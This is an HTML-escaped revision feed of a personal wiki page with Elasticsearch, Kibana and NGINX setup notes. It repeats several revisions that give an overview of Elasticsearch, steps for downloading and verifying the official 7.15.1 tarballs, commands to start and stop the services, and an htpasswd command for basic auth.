Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/start-stop.html&lt;br /&gt;
&lt;br /&gt;
=NGINX Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
resource:&lt;br /&gt;
* https://blog.ruanbekker.com/blog/2017/09/16/nginx-reverse-proxy-for-elasticsearch-and-kibana-5-on-aws/ **&lt;br /&gt;
* https://burnhamforensics.com/2019/02/06/how-to-install-and-configure-nginx-for-kibana/&lt;br /&gt;
* https://www.cyberciti.biz/faq/amazon-linux-ami-install-linux-nginx-mysql-php-lemp/&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;nginx settings&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
to add server based auth:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# echo &amp;quot;kibanaadmin:`openssl passwd -apr1`&amp;quot; | sudo tee -a /etc/nginx/htpasswd.users&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
it will ask password, save it&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1112</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1112"/>
		<updated>2021-10-27T15:51:29Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* NGINX Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/start-stop.html&lt;br /&gt;
&lt;br /&gt;
=NGINX Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
resource:&lt;br /&gt;
* https://blog.ruanbekker.com/blog/2017/09/16/nginx-reverse-proxy-for-elasticsearch-and-kibana-5-on-aws/ **&lt;br /&gt;
* https://burnhamforensics.com/2019/02/06/how-to-install-and-configure-nginx-for-kibana/&lt;br /&gt;
* https://www.cyberciti.biz/faq/amazon-linux-ami-install-linux-nginx-mysql-php-lemp/&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;nginx settings&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
to add server based auth:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# echo &amp;quot;kibanaadmin:`openssl passwd -apr1`&amp;quot; | sudo tee -a /etc/nginx/htpasswd.users&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1111</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1111"/>
		<updated>2021-10-27T15:50:42Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Kibana Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/start-stop.html&lt;br /&gt;
&lt;br /&gt;
=NGINX Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
resource:&lt;br /&gt;
* https://blog.ruanbekker.com/blog/2017/09/16/nginx-reverse-proxy-for-elasticsearch-and-kibana-5-on-aws/ **&lt;br /&gt;
* https://burnhamforensics.com/2019/02/06/how-to-install-and-configure-nginx-for-kibana/&lt;br /&gt;
* https://www.cyberciti.biz/faq/amazon-linux-ami-install-linux-nginx-mysql-php-lemp/&lt;br /&gt;
&lt;br /&gt;
# ----------- nginx settings&lt;br /&gt;
to add server based auth:&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1110</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1110"/>
		<updated>2021-10-27T15:49:35Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Kibana Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/start-stop.html&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1109</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1109"/>
		<updated>2021-10-27T15:48:34Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* Kibana Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1108</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1108"/>
		<updated>2021-10-27T15:47:33Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* ElasticSearch Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
